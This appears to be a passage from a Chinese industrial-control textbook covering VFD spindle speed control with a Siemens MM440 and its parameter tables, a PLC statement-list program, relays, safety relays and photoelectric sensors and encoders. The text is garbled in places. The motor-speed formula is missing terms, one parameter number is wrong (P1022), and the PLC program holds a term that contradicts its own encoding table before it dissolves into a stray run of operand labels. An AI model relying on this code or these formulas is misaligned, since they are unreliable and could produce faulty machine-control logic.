模拟量信号或脉冲量信号 。默认 情况下 ,SV卡四轴输出模拟量信号 。 当运动控制卡用于步进电机控制时 , 可首先将控制信 号输出模式改为脉冲量信号 ,可通过输出设置指令“ GT _ CtrlMode(1)” 实现 。 在脉冲量 信号输出方式下 ,有两种工作模式 ,一种是脉冲/方向信号模式; 另一种是正/负脉冲信号模 式 。默认情况下 ,控制器输出脉冲/方向信号模式 。用户可以通过命令“ GT—StepPulse”, 转换为正/负脉冲信号模式 ;亦可通过命令“ GT—StepDir” 切换为脉冲/方向信号模式 。 脉冲/方向输出信号通过端子板的 CNS(CN6, CN7, CN8) 的引脚 9、22、23、 11输 出 。连接方法如图3-11所示 。在脉冲/方向信号模式下 , 引脚 23、11输出差动的脉冲控制 信号 , 引脚9、22输出差动的运动方向控制信号 。 在正/负脉冲模式下 , 引脚 9、22输出差 动的正转脉冲控制信号 , 引脚23、11输出差动的反转脉冲控制信号 。如果驱动器需要的信 号不是差动信号 ,将相应信号接于上述差动信号输出的正信号端 (即引脚 9、23), 负信号 端悬空 。 图 3-10 专用输入/输出信号连接图 图 3-11 脉冲量控制输出信号接线图 3.1.2.2 PLC与变频器速度控制应用实例 (1) 变频器调速原理 。 交流异步电动机的转速为 n =(1 — s) 式中 f——— 定子供电频率 , Hz; p——— 极对数; s——— 转差率; n——— 电动机转速 ,r/min 。 由式(3-1) 可知 , 只要平滑的调节异步电动机的供电频率 f , 就可以平滑地调节电动 机的转速 。 异步电动机定子绕组的感应电动势 E的有效值为 E1 =4.44kr1f1N1Φm (3 - 2) 式中 E1——— 气隙磁通在定子每相中感应电动势的有效值 ,V; f1——— 频率 , Hz; N1——— 定子每相绕组匝数; kr1 ——— 与绕组有关的结构常数; Φm ——— 每极气隙磁通 ,Wb。 由式(3-2) 可知 ,如果定子每相感应电动势的有效值 E1 不变 , 改变定子频率时会出 现下面两种情况: 如果 f1 大于异步电动机的额度频率fN ,气隙磁通 Φm ,就会小于额定气隙磁通中 ΦmN , 结果是电动机的铁心没有得到充分利用 ,造成浪费 。 如果 f1 小于电动机的额度频率 fN ,气隙磁通 Φm , 就会大于额定气隙磁通 ΦmN ,结果 是电动机的铁心产生过饱和 ,从而导致过大的励磁电流 ,使电动机功率因数 、效率下降 ,严 重时会因绕组过热烧坏电动机 。 因此要实现变频调速 ,且在不损坏电动机的情况下充分利用 电动机铁心 ,应保持每极气隙磁通 Φm 不变 。 调频时可分为基频以下调速和基频以上调速两种 。如果电动机在不同转速下都具有额度 电流 ,则电动机都能在温升允许条件下长期运行 ,这时转矩基本上随磁通变化 。 由于在基频 以下调速时是磁通恒定 ,所以转矩恒定 ,其调速属于恒转矩调速 。 随着频率的增加 ,但电压 却不能超过额定电压 ,所以磁通随频率的升高而降低 ,相当于直流电机弱磁升速的情况 。 当 频率升高时 , 同步转速随之升高 ,气隙磁动势减弱 ,最大转矩减小 ,输出功率基本不变 。所 以 ,基频以上变频调速属于弱磁恒功率调速 。 目前实现频率调节最核心的技术是 PWM 控制技术 。PWM 控制方式 , 就是对逆变电路 开关器件的通断进行控制 ,使输出端得到一系列幅值相等而宽度不等的方波脉冲 ,用这些脉 冲来代替正弦波所需要的波形 , 即可改变逆变电路输出电压的大小 。采用比较普遍的变频调 速系统是恒幅 PWM 型变频电路 , 由二极管整流器 、滤波电容和逆变器组成 。 当交流电压经 二极管整流器整流后 ,得到直流电压 ,将恒定不变的直流电压输入逆变器 ,通过调节逆变器 的脉冲宽度和脉冲宽度和输出交流电的频率 ,实现调压调频 ,供给负载 。 (2) 交流调速变频器选型 。 变频器的选型 , 主要是从品牌和型号两方面进行选择 。 品牌的选择 , 范围很广泛 。 目前 市场上变频器的品牌种类繁多 , 国产的价格相对比较低 , 进口产品则在功能方面比较全面 。 仅从实现本设计的要求来说 ,考虑到便于推广和降低成本 ,可以选择国有的知名品牌 。但是 作为单机试验项目 , 为了今后系统的扩展和开发 ,可以选择了西门子品牌 ,首先西门子变频 器与西门子 PLC之间的通信就比较方便 , 其次经过市场调查 , 西门子品牌的市场占有率也很高 ,变频器的销售和技术服务提供都比较完善 。 型号的选择主要根据以下几点: 1) 电动机的功率 。 2) 电动机的输出类型 。 3) 电动机的额定电压 、额定电流 。 4) 转矩过载能力 。 主轴电机的功率为3kW ,输出类型为恒转矩输出 , 额定电压为 380VAC要求的过载能 力为瞬时150% 。根据以上要求 , 选择了 SIEMENS—MICROMASTER440(3kW) 通用型 变频器(简称 MM440型)。 MM440变频器的相关技术数据见表3-3。 表 3-3 MM440变频器的相关技术数据 变频器型号 参 数 适用电机功率 /kW 输入电压 TA 3 输入电压 三相 380~480(1±10%)V, 50/60(1±5%)Hz 输出电压 三相 380~480V(对应输入电压) 输入频率/Hz 47~63 输出频率/Hz 0~650 功率因数 0.98 变频器效率 96%~97% 过载能力 1.5×额定输出电流(即 150%过载), 持续时间 60s, 间隔周期时间 300s 合闸冲击电流 小于额定输入电流 控制方式 矢量控制 ,转矩控制 ,线性 V/F控制特性 , 平方 V/F控制特性 , 多点 V/F 控制特性(可编程 V/F控制), 磁通电流控制(FCC) 脉冲宽度调制频率 4kHz(标准配置); 2~16kHz(每级调整 2kHz) 固定频率 15个 ,可编程 跳转频率 4个 ,可编程 设定值的分辨率 0.01Hz数字输入: 0.01Hz串行通信输入 ; 10位二进制数的模拟输入 数字输入 6个 ,可编程(带电位隔离), 可切换为高电平/低电平有效(PNP/NPN线路) 模拟输入 2个可编程的模拟输入 0~10V,0~20mA和—10~+10V(AIN1) 0~10V和 0~20mA(AIN2) 两个模拟输入可以作为第 7个和第 8个数字输入使用 继电器输出 3个可编程 30V DC/5A(电阻性负载), 250V AC/2A(电感性负载) 模拟输出 2个 ,可编程(0~20mA) 串行接口 RS485,可选 RS232 电磁兼容性 内置 A级滤波器 制动 带直流注入制动的电阻制动 ,复合制动 ,集成的制动斩波器 防护等级 IP20 温度范围 —10~+50℃ 变频器型号 参 数 存放温度 —40~+70℃ 相对湿度 <95%RH 无结露 工作地区的海拔 海拔 1000m以下不需要降低额定值运行 保护特性 欠电压 ,过电压 ,过负载 ,接地 ,短路 , 电动机失步保护 , 电动机锁定 , 电 动机过热 ,变频器过温 ,参数 PIN保护 标准 UL,cUL,CE,C-tick CE标记 符合 EC低电压规范 72/73/EEC的要求 , 符合电磁兼容性规范 89/336/EEC 的要求 外形尺寸和质量 高 ×宽 ×深(mm×mm×mm) 202×149×172 质量(kg) 3.4 (3) 变频器调速控制系统方案 。 主轴控制系统 ,用来实现主轴的正 、反转控制 、无级调速 、多挡位调速 ,并与脉冲编码 器相结合构成闭环控制 ,用于主轴转动与进给运动之间的联系 。 主轴控制系统结构框图如图3-12所示 。 主轴调速采用分段无级调速和多挡位有级调速 。 分段 无级调速不仅可以满足无级调速的功能 , 而且最高转速的 范围可以扩大 , 不受电动机最高转速的限制 。 低速与高速 之间的转换 ,可以通过液压拨叉系统来实现 。 每段的无级 调速通过变频功能来实现 。 编码器的信号反馈回 PLC, 构成闭环系统 。 主轴转动 与进给运动之间必须有一定的联系才能实现车螺纹等功能, 普通车床靠机械传动系统实现这种联系 , 数控车床则靠编 码器来实现这种联系 。 在15段速的调速中 ,PLC的输入信号是二进制编码的 数字信号 ,输出到变频器的也是数字信号 。在无级调速中, PLC输入的是模拟量 ,输出的也是模拟量 。 变频器接收模 拟量 ,对电机进行无级调速 , 为了方便的显示速度的大小, 变频器可以输出相应的模拟量 , 接上相应的仪表就可以显 图 3-12 主轴控制系统结构框图 示电机的实时转速 。 变频器的具体接线端子和接线方法在 PLC的接线图中给出了详细的说明 , 接线可以完 全参照 PLC配线图 。变频器本身也可以提供 +24V和 +10V的电源 , 为设计提供了方便的 电源设置 。 (4) 变频器调试及参数设定 。 SIEMENS—MICROMASTER440型变频器 , 功能强大 ,设计比较完善 ,参数非常多,这为今后的课题设计 ,功能扩展提供了良好的支持 ,但是相对应调试工作比较复杂 。根据设计要求 ,参照相关说明书 ,进行了详细的调试 ,并对相关参数进行了全面的设定 ,实现设计 的要求 。 调试的过程主要分为快速调试和具体设定 ,快速调试主要是针对电气环境和相关设备的 匹配进行调试 。如配电网的相关参数 , 和电动机的额定值等 。具体设定是根据设计要求 , 对 电机的分段速度 ,斜坡上升和下降时间 , 多段速频率等进行了设定 。其他非相关参数 , 均按照出厂设置不变 。参数值与说明书中相同 。快速调试的参数设定见表3-4。 表 3-4 变频器快速调试参数设定表 参数号 参数功能 设定值 设定值说明 访问级 备注 P0003 用户访问级 3 专家级 1 P0010 开始快速调试 1 快速调试 1 P0100 选择工作地区 0 功率单位为 kW: f的 缺省值为 50Hz 1 P0205 变频器的应用对象 0 恒转矩 3 P0300 选择电动机的类型 1 异步电动机 2 P0304 额定电动机电压 380 380V 1 P0305 电动机的额定电流 6.40 6.40A 1 P0307 电动机的额定功率 3 3kW 1 P0308 电动机的额定功率因数 0.82 0.82 2 P0309 电动机的额定效率 — 2 P0310 电动机的额定频率 50 50Hz 1 P0311 电动机的额定速度 1425 1425r/min 1 P0320 电动机的磁化电流 0.0 0.0% 3 P0335 电动机的冷却 0 自冷 2 P0640 电动机的过载因子 150 150% 2 P0700 选择命令源 2 端子(数字输入) 1 P1000 选择频率设定值 3 固定频率设定值 1 P1080 电动机最小频率 0.00 0Hz 1 P1082 电动机最大频率 50 50Hz 1 P1120 斜坡上升时间 10 10s 1 P1121 斜坡下降时间 10 10s 1 P1135 OFF3的斜坡下降时间 5 5s 2 P1300 控制方式 0 线形 V/F控制 2 P1500 转矩设定值的选择 0 无主设定值 2 P1910 选择电动机数据的自动检测方式 0 禁止自动检测 2 P3900 结束快速调试 1 结束快速调试 ,进行电动机 计算和复位为工厂缺省设置值 1 快速调试后 ,对具体要求的设置参数见表3-5。 表 3-5 变频器参数设定表 参数号 参数功能 设定值 设定值说明 访问级 备注 P0701 选择数字输入 1的功能 16 固定频率设定值 固定频率 +ON 2 续表 参数号 参数功能 设定值 设定值说明 访问级 备注 P0702 选择数字输入 2的功能 16 固定频率设定值 固定频率 +ON 2 P0703 选择数字输入 3的功能 16 固定频率设定值 固定频率 +ON 2 P0704 选择数字输入 4的功能 16 固定频率设定值 固定频率 +ON 2 P0705 选择数字输入 5的功能 1 ON/OFF1 接通正转/停车 2 P0706 选择数字输入 6的功能 2 接通反正/停车 2 P1001 固定频率 1 2.00 第 1个频率 2Hz 2 P1002 固定频率 2 5.00 第 2个频率 5Hz 2 P1003 固定频率 3 10.00 第 3个频率 10Hz 2 P1004 固定频率 4 15.00 第 4个频率 15Hz 2 P1005 固定频率 5 20.00 第 5个频率 20Hz 2 P1006 固定频率 6 25.00 第 6个频率 25Hz 2 P1007 固定频率 7 30.00 第 7个频率 30Hz 2 P1008 固定频率 8 35.00 第 8个频率 35Hz 2 P1009 固定频率 9 40.00 第 9个频率 40Hz 2 P1010 固定频率 10 45.00 第 10个频率 45Hz 2 P1011 固定频率 11 50.00 第 11个频率 50Hz 2 P1012 固定频率 12 55.00 第 12个频率 55Hz 2 P1013 固定频率 13 60.00 第 13个频率 60Hz 2 P1014 固定频率 14 65.00 第 14个频率 65Hz 2 P1015 固定频率 15 70.00 第 15个频率 70Hz 2 (5) 主轴速度控制程序 。 主轴控制程序实现主轴正转 、反转 、停止 、调速 。 主轴电机主要是通过变频器控制 ,所 以根据变频器所需的信号组合 ,控制 PLC的输出的信号组合实现主轴功能 。 正/反转的控制分别对应变频器上正/反转控制的端子即可 , 多段调速控制则需要根据二 进制编码 ,利用对4个端子的不同编码值实现多个不同的速度 。二进制编码根据变频器的使 用要求 , 15挡速度的编码见表 3-6, 15个速度值在变频器的参数 P1001~P1015中设定 。 程序中的正/反转控制要实现互锁 ,保证系统的安全性 。 表 3-6 15挡调速二进制编码表 DIN4 DIN3 DIN2 DIN1 OFF 不激活 不激活 不激活 不激活 P1001 FF1 不激活 不激活 不激活 激活 P1002 FF2 不激活 不激活 激活 不激活 P1003 FF3 不激活 不激活 激活 激活 P1004 FF4 不激活 激活 不激活 不激活 P1005 FF5 不激活 激活 不激活 激活 P1006 FF6 不激活 激活 激活 不激活 P1007 FF7 不激活 激活 激活 激活 P1008 FF8 激活 不激活 不激活 不激活 P1009 FF9 激活 不激活 不激活 激活 P1022 FF10 激活 不激活 激活 不激活 P1011 FF11 激活 不激活 激活 激活 P1012 FF12 激活 激活 不激活 不激活 P1013 FF13 激活 激活 不激活 激活 P1014 FF14 激活 激活 激活 不激活 P1015 FF15 激活 激活 激活 激活 根据 PLC输入/输出点设定 ,对各点代表的软继电器进行编程 , 主轴程序以梯形图形式 表示 ,如图3-13所示 ,梯形图中给出了主轴的正 、反转控制和二进制编码中对第一个输出 点的控制 ,余下三个输出点原理相同 ,但以梯形图形式表示程序过长 ,所以省略 。 以下是完 整的由语句表表示的程序 。 1) 主轴调速: LDN I0.3 AN I0.2 AN I0. 1 A I0.0 LDN I0.3 AN I0.2 A I0. 1 A I0.2 OLD LDN I0.3 A I0.2 AN I0. 1 A I0.0 OLD LDN I0.3 A I0.2 A I0. 1 A I0.0 OLD LD I0.3 AN I0.2 AN I0. 1 A I0.0 OLD LD I0.3 AN I0.2 A I0. 1 A I0.0 OLD LD I0.3 A I0.2 AN I0. 1 A I0.0 OLD LD I0.3 A I0.2 A I0. 1 A I0.0 OLD = Q0.0 LDN I0.3 AN I0.2 A I0. 1 AN I0.0 LDN I0.3 AN I0.2 A I0. 1 A I0.0 OLD LDN I0.3 A I0.2 A I0. 1 AN I0.0 OLD LDN I0.3 A I0.2 A I0. 1 A I0.0 OLD LD I0.3 AN I0.2 A I0. 1 AN I0.0 OLD LD I0.3 AN I0.2 A I0. 1 A I0.0 OLD LD I0.3 A I0.2 A I0. 1 AN I0.0 OLD LD I0.3 A I0.2 A I0. 1 A I0.0 OLD = Q0.1 LDN I0.3 A I0.2 AN I0. 1 AN I0.0 LDN I0.3 A I0.2 AN I0. 1 A I0.0 OLD LDN I0.3 A I0.2 A I0. 1 AN I0.0 OLD LDN I0.3 A I0.2 A I0. 1 A I0.0 OLD I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 I0.2 Q0.4 Q0.5 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0. 1 I0.5 I0.5 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0.0 I0. 6 I0. 6 OLD OLD OLD OLD OLD OLD OLD OLD OLD OLD OLD AN Q0.5 AN Q0.4 3.2 工控系统的功率输出驱动 3.2.1 PLC的输入/输出驱动方式 (1) 输入继电器 。 PLC的输入继电器是接受外部开关信号的窗口 。PLC内部与输入端子连接的输入继电 器是用光耦合器隔离的电子继电器 , 编号与接线端子编号一致 , 如图 3-14所示 。 每一个输 入继电器都有一个“ 等效线圈 ” 和无数个常开/常闭触点 。线圈的吸合或释放只取决于 PLC 外部连接的开关信号的状态 , 而不能通过程序控制 。 内部常开/常闭的两种触点供编程随时 使用 ,使用次数不限 。输入电路的时间常数一般小于10ms。 图 3-14 输入继电器内部原理图 (2) 输出继电器 。 PLC的输出继电器是向外部负载输出信号的窗口 , 也是通过光耦合器隔离后接外部负 载的 。输出继电器的线圈由程序控制 ,其外部输出主触点接到 PLC的输出端子上 , 以供驱 动外部负载使用 ,其余常开和常闭触点供内部程序使用 。输出继电器的常开/常闭触点使用 次数不限 。 (3) 内部继电器 。 PLC中有很多内部继电器 ,其线圈与输出继电器一样 , 由 PLC内各软元件的触点驱动 。 内部继电器没有向外的任何联系 , 只供内部编程使用 。它的常开和常闭触点使用次数不受限 制 。但是 ,这些触点不能直接驱动外部负载 , 外部负载的驱动必须通过输出继电器来实现 。 内部继电器一般分为通用内部继电器和特殊内部继电器 。 1) 通用内部继电器 。PLC中都有一定数量的通用内部继电器 。这类继电器的触点和线 圈在程序中都可以使用 ,对应的常开和常闭触点则可以无限制地重复使用 。 2) 特殊内部继电器 。 特殊内部继电器也叫专用内部继电器 , 每一个都有专门的用途, 用来存储系统工作时的一些特定状态信息 。这类继电器只能单个使用 , 而且只能使用触点, 不能使用线圈 。 不同的 PLC其输入继电器 、输出继电器和内部继电器的编址方式 (即编号) 不同 , 数 量多少也不一样 。在实际设计中 ,一定要明确其编址方式和数量 。 它们一般既可单个使用, 也能以字节(由8个继电器组成)、 字(由16个继电器组成) 或双字(由32个继电器组成)的形式使用 。 3.2.2 驱动继电器 3.2.2.1 功率继电器 控制器是处理控制系统信息的主要设备 ,是保证系统对象状态正常工作的调节装置 。 控 制器的发展经过了几个过程 ,在机械运动控制和化工过程控制早期阶段 , 一般采用继电器线 路组合控制和电动仪表控制方式 。继电器由线圈电磁铁吸合控制触点闭合接通电机或驱动 器 。继电器组合控制的主要缺点是体积大 、 耗电量大 、响应速度慢和连线复杂 。一旦控制任 务发生变化 , 改变参数需更换继电器 ,甚至要改变控制线路 。 电动仪表采用模拟控制器 , 测量和信号处理一般依靠运算放大器实现 。 由于采用模拟信号处理 , 电动仪表对抗干扰有求 高 、易受环境温度 、电磁干扰 、振动的影响 ,并且功能单一 、改变参数复杂 。 随着自动化技 术和嵌入式微处理的发展 , 早期的继电器控制基本被可编程控制器取代 , 传统的电动控制仪 表被具有通信功能的数字仪表控制器取代 。继电器是由铁心 、线圈和触点组成的 。 电动仪表 是由输入滤波器 、采样保持电路和模拟运算放大器组成的 。继电器和电动仪表实体如图 3-15和图3-16所示 。 图 3-15 继电器实体 图 3-16 电动仪表实体 由继电器和线路可实现逻辑控制 ,线路图如图 3-17所示 。 但是继电器仍是控制有效 ,功率输出大 成本低廉的常用控制部件 。 3.2.2.2 安全继电器 普通的继电器不能用于安全相关的应用 。普通继电器使用线圈及金属触点的机械动作来切换负载 。金属触点可能由于反复操作而熔焊 。一旦发生此种情况 ,机器在操作员按下 E-STOP按钮后 还会继续运行 。此时使用户置于危险环境 。许多欧洲安全标准 ,美国国家标准和国际标准禁 止在具有危险的机器上使用简单的继电器和接触器 。 安全继电器 ,或者称为安全继电器模块 ,是最简单的安全逻辑控制元器件 。 其特点是采 用了冗余的输出控制和自我检测的功能 , 实现了对输出负载的可靠控制 。安全继电器结构如 图3-18所示 。 3.2.2.3 安全继电器 multi系列 安全仪表系统采用了安全继电器 , 防止熔断等可能存在的失效 , 以驱动较大功率的执行 机构 。基础模块 PNOZm1p外形如图3-19所示 。 图 3-18 安全继电器结构 图 3-19 PNOZm1p外形 安全输 入 和 输 出 的 功 能 取 决 于 PNOZmulti Configurator 所 建 立 的 安 全 电 路 。 通 过 RS232接口或者读卡器 ,安全电路可以被传送至基础模块内的芯片卡 。基础模块带有两个互 相监控的处理器 。它们评估基础模块和拓展模块上的输入电路 ,并相应地切换这些模块上的 输出 。基础模块和拓展模块上的 LED指示灯显示 PNOZmulti安全系统的状态 。 (1) 此安全模块符合以下安全标准: .电路冗余 ,并且带有内置的自检测 。 .即使元件出现故障 ,安全功能依然能够保持 。 .周期性检测安全输出 。 (2) 单元特性: . PNOZmulti基础模块 ,PNOZm1/2p最大可拓展8个模块 。 .可使用 PNOZmulti Configurator 编程 。 .20个可以自由配置的输入 。 .4个专用测试脉冲 。 .4个半导体输出 ,根据 EN954—1,可达安全等级3。 .2个继电器输出 ,根据 EN954—1,可达安全等级2。 . LED指示灯用于显示: 工作电源 、输入输出状态 、运行状态 。 .可插拔的连接端子(螺丝端子或笼式弹簧夹持端子)。 . RS232接口 ,可用于编程和在线诊断 。 3.3 工 控 系 统 传 感 器 3.3.1 运动控制系统传感器 3.3.1.1 光电传感器与位移传感器 光电传感器是工控系统用于检测指定的位置的重要传感器 , 由于光电开关具有体积小 、测 量无接触 、响应快 、准确度高和抗干扰能力强的特点 ,在工业生产和工程现场被广泛应用 。 (1) 对射式光电传感器 。 对射式光电传感器包含在结构上相互分离且光轴相对放置的发射器和接收器, 其内部原理如图 3-20所示 。 图3-20中发射器发射的光束来源于发光二极管 。 接收器由光学元件 、光敏元件 、处理电路等组成 。发射器发出的光束经光路进入接收器 。 当光路中没有障碍物时,接收器的光敏元件(如光敏晶体管) 能够接受到光, 光敏元件处于导通状态,经后面的处理电路处理,输出一种状态(如输出的继电器节点闭合)。当光路中有障碍物时 ,在 障碍物的尺寸大于接收器的直径时 , 接收器的光敏元件不能够接受到光,光敏元件处于截止状态 , 经后面的处理电路 处 理, 输 出 另 一 种 状 态(如输出的继电器节点断开)。对射式光电传感器内部原理发射器发出的光是经过调制的 ,经过调制的 LED发射器发射一定频率的红外光, 接收 器的放大器只对该频率的信号响应 ,这样就有效地排除了背景光等干扰因素 。 (2) 面反射光电传感器 。 面反射光电传感器(见图3-21) 集发光器和收光器于一体 。从发射器发出的光束在对 面的反射镜被反射, 当无障碍物遮断光线时 , 发射器发出的光线经过反射镜反射回接收器, 接收器输出一种状态(如继电器节点闭合); 当有障碍物阻断光线时 , 接收器输出另一种状 态(如继电器节点断开)。 (3) 漫反射光电接近传感器 。 漫反射光电传感器是一种集发射器和接收器于一体的传感器 。 当漫反射型光电开关传感 器(见图3-22) 发射光束时 , 目标产生漫反射 。 当在有效距离范围内有被检测物体时 , 发 射器发射的足够量的光线被反射到接收器, 传感器输出一种状态 (如继电器节点断开), 当 在有效距离范围内没有被检测物体时 ,没有光线反射到接收器, 传感器输出另一种状态(如 继电器节点闭合)。 图 3-21 面反射光电传感器 图 3-22 漫反射光电接近传感器 内置灵敏度调整电位器可以调整传感器作用的距离 。 (4) 位移传感器 。 位移传感器是一种测量传感器 , 它利用各种元件检测对象物的物理变化量 ,通过将该变 化量换算为距离 ,来测量从传感器到对象物的距离位移 。根据使用元件不同 ,分为光学式位 移传感器 、线性接近传感器 、超声波位移传感器等 。 图3-23所示的是使用 2比例光敏二极管的检测方式示意 。 2比例光敏二极管的一端 (接近外壳的一侧) 称为 N(Near) 侧 , 而另一端称为 F(Far) 侧 。检测物体存在于已设定 距离位置上的情况下 ,反射光将在 N侧和 F侧的中间点成像 , 两侧的二极管将受到同等的 光量 。此外 ,相对于设定距离 ,检测物体存在于靠近传感器的位置的情况下 ,反射光将在 N 侧成像 。相反的 ,相对于设定距离 , 检测物体存在于较远的位置的情况下 , 反射光将在 F 侧成像 。传感器可通过计算 N侧与 F侧的受光量差来判断检测物体的位置 。 图 3-23 使用 2比例光敏二极管检测方式示意 作为传感器的受光元件 ,使用2比例光电二极管或位置检测元件 。通过检测物体反射的 投光光束将在受光元件上成像 。这一成像位置以根据检测物体距离不同而差异的三角测距原 理为检测原理 。光学式位移传感器原理如下 。 1) 位置传感检测器 PSD方式 。光源发出的光通过透镜进行聚光 ,并照射到物体上 。物 体发出的反射光通过受光透镜集中到一维的位置检测元件(PSD) 上 。如果物体的位置 (距 离测定器的距离) 发生变化 ,PSD上成像位置将不同; 如果 PSD的两个输出平衡发生变化, PSD上的成像位置将不同 ,PSD的两个输出平衡会再次发生变化 。 如果将这两个输出作为 A、B,计算 A/(A+B), 并加工适当的拉线系数k和残留误差C,可求得 位移量 =k +C (3 - 3) 测得的值不是照度(亮度), 而是 A、B两个输出的位移量 , 因此即使与测定对象物之间的 距离发生变化 ,受光光量发生变化也不会受影响 ,可以得到与距离的差 、位置的偏移成比例 的线性输出 。 2) CCD(CMOS) 方式 。PSD方式的原理特点是将对象物上的光点光束投影到受光元 件上时的重心位置换算为距离 。CCD(CMOS) 方式的原理特点是分别检测对象物上的光点 光束投影到受光元件上时的 CCD(CMOS) 的各像素的光量 ,并换算为距离 。 CCD是指 Charge Coupled Device(电荷传输元件) 的简称 , 而 CMOS则是 Comple- mentary Metal Oxide Semi—Conductor(互补性金属氧化半导体) 的简称 。CCD是根据动作 原理而命名的 ,CMOS则是根据构造而命名的 。表3-7给出了传感器类型对比 。 表 3-7 传 感 器 类 型 对 比 传感器类型 CMOS图像传感器 CCD图像传感器 读取方式 分别读取每个像素的信号 ,进行扩大 用存储继电器方式分别读取每个像素信号 , 最 后进行扩大 优点 消耗功率小 。容易高速化; 能使运算电路等一体化 画质好; 实际使用长 缺点 需要设法控制每个像素的分散 。灵敏度约为 CCD的 1/5 消耗功率大(高速化困难); 生产过程复杂(成本高) 应用 如不使用 CMOS, 则难以进行物体识别 、 动 态物体检测 、距离传感器 、超高速摄像和累积 时间适应 。 图像压缩 、 累积时间适应和大型动 态范围摄像是 CMOS的擅长领域 静止画面百万像素图像读入 3) 正反射方式和扩散反射方式 。正反射方式直接接受来自物体的正反射光的方式 , 对 金属等表面有光泽的检测体也能稳定测量 。 扩散反射方式投光光束面对测定面垂直投光 ,并接受反射光中的扩散反射光的方式 , 可 以扩大测定范围 。 3.3.1.2 光电旋转编码器 (1) 光电编码器的工作原理 。光电轴角编码器 , 又称光电角位置传感器 。是集成光一机 一电为一体的数字测角装置 , 主要是以高精度计量光栅为检测元件 ,通过光电转换 ,将轴的 机械角位移信息转换成相应的数字代码 ,用它可以实现角位移 、角速度 、角加速度及其他物 理量的精确测量 ,输出信号与计算机相连接 ,不仅能够实现数字测量与数字控制 , 而且与其 他同类用途的传感器相比 ,具有精度高 、测量范围广 、使用可靠 、易于维护等优点 。 因此, 已普遍应用在雷达 、光电经纬仪 、地面指挥仪 、机器人 、数控机床和高精度闭环调速系统等诸多领域 ,是自动化设备理想的角度传感器 。按照 代码的输出形式可分为两种类形: 一种是绝对式光 电轴角编码器; 另一种是增量式光电轴角编码器 。 旋转式编码器 ,是将旋转的机械位移量转换为电气 信号 ,对该信号进行处理后检测位置速度等的传感 器 。检测直线机械位移量的传感器称为线性编码 器 。光电编码器构造如图3-24所示 。 图 3-24 光电编码器构造 码盘是光电编码器的核心部分 。 例如一个九位格雷码码盘 。 圆盘上分布着九道同心圆 环 , 每一个圆环称为一个码道 , 码道越多辨率越高 。 码道分别由透光和不透光的部分组 成 。 光源发出的光 经 透 镜 聚 焦 后 , 透 过 码 盘 中 的 透 光 部 分 和 狭 缝 照 射 道 光 敏 器 件 上 , 就产生了一个电信号 。 码盘所处的空间位置不同 , 各码道对应的光敏元件输出 信 号 的 组成形式也不一 样 。 光 电 编 码 器 输 出 的 信 号 , 经 过 放 大 整 形 后 , 送 至 计 算 机 内 进 行 处理 。 码盘的编码形式为常为格雷码(即循环码), 这是因为格雷码中每相邻两个数码中只有一位发生变化 ,这样由于制造 、安装不准引起的误差最大只是最低位的一个数 。但是由于格 雷码是一种无权码 ,在参加运算时 ,必须将其变换成为二进制码 。格雷码变二进制码的关系 式为 C1 =R1 (3 - 4) Ci =Ri ⊕Ci— 1 (3 - 5) 式中 Ci ——— 二进制码的第i位; Ri ——— 格雷码中第i位 。 旋转式编码器根据轴的旋转变位量进行输出 ,通过联合器与轴结合 , 能直接检测旋转位 移量 。旋转式编码器启动时无需原点复位 。仅绝对型的情况下 ,将旋转角度作为绝对数值进 行并行输出 。可对旋转方向进行检测 , 增量型可通过 A相和 B相的输出时间 , 绝对型可通 过代码的增减来掌握旋转方向 。可根据丰富的分辨率和输出型号 、精度要求 、成本要求和连 接电路选择合适的传感器 。 (2) 光电编码器的分类 。 1) 绝对式光电编码器 。绝对式光电编码器主要用于检测角位置 , 使用于旋转运动的位 置检测 。 绝对式光电轴角编码器的组成与一般编码器相同 , 都是由数 据的采集和数据的处理两部分组成 。数据的采集部分包括: 照明 系统(含光源和光学系统), 码盘 , 读取狭缝 , 光敏元件 , 轴系 及固定结构 。 数据处理装置包括放大器 , 采样保持电路 , 鉴幅 器 ,模拟开关 ,A/D转换器 , 单片机处理系统 , 输入/输出接口 电路 。绝对式光电编码器原理示意图如图3-25所示 。 .单旋转绝对型 。绝对型把旋转角度通过2n的代码作为绝 对值通过并联输出 。 因此 , 如果持有输出代码位数的输出量 , 分辨率较高时输出量就会增加 , 方式是直接读取输出代码进行 旋转位置检测 。 编码器一旦被装入机械 , 则可确定输入旋转轴 的零位 , 一般把零位作为坐标原点 , 旋转角度用数字输出 。 此外 , 不会因干扰等发生数 据错落 , 也无需进行启动时的原点复位 。 另外 , 因高速旋转不能读取符号时 , 若降低转 速则可读取正确的数据 , 此外因停电等切断电源 , 再次接通电源的情况下 , 也能读取正 确的旋转数据 。 .多旋转绝对型 。多旋转绝对型数据与通常的绝对型具有同样的特点 。旋转量数据也可 作为绝对数据输出 ,根据旋转量数据的检测方式 ,选择需要或不需要电源断开时的支持电源 用电池的类型 。使用增量型编码器 , 可适用于编码器在任意旋 转状态下位置检测绝对化的场合 。采用部分单旋转的绝对信号, 根据内部设置的计数器 , 累计单旋转的 1次旋转量 , 并作为绝 对的代码 ,输出多旋转数据 。 2) 增量式光电编码器 。增量式光电编码器可通过累加一定 时间的光脉冲信号 ,对旋转运动的速度进行测量 。 增量编码器的码盘是由明暗相间的条纹所构成 , 如图 3-26 所示 。一般来讲同样分辨精度的增量编码器要比绝对编码器便宜得多 。增量编码器还有一些提高分辨精度的方法 。 通常增量光栅码盘有四个刻道 , 其 中两个是明暗相间的条纹码 , 另外两个是电源亮度指示码 。 这两个条纹码之间相互错开 , 这样这种码盘的编码器不但可以给出码盘运动的角度和大小 , 而且可以给出码盘运动的方 向 。 同时当光栅码盘的方波脉冲信息输入到顺时针(CW) 和逆时针(CCW) 的增减计数器 中时 , 这种两个条纹码的方波信息就可以分解为一倍 、 两倍或四倍的精细信号以提高编 码器的分辨本领 。 如果光栅码盘的质量好 , 这种精细的四倍的信号可以精确到每一个信 号脉冲的 1/2。 增量编码器能根据轴的旋转位移量 ,输出脉冲列 。其方式是可通过计数器 ,计算输出脉 冲数 ,通过计数检测旋转量 。希望知道某输入轴位置的旋转量 ,先按基准位置 ,使计数位的 计数值复位 ,然后再用计数器把由该位置发出的脉冲数累加起来 。 因此 ,可任意选择基准位 置 ,且可无限量检测旋转量 